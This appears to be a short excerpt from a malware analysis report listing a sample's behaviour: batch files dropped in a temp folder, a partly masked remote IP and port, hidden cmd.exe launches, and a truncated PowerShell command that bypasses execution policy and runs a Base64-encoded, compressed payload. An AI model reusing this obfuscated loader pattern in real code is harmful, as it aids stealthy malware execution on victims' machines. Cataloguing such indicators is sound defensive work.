Technical Information
- %TEMP%\a746.tmp\a747.tmp\a748.bat
- %TEMP%\a746.tmp\a747.tmp\a748.bat
- '19#.#61.193.99':52620
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\A746.tmp\A747.tmp\A748.bat <Full path to file>"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\A746.tmp\A747.tmp\A748.bat <Full path to file>"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoLogo -ExecutionPolicy Bypass -NoProfile -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromB...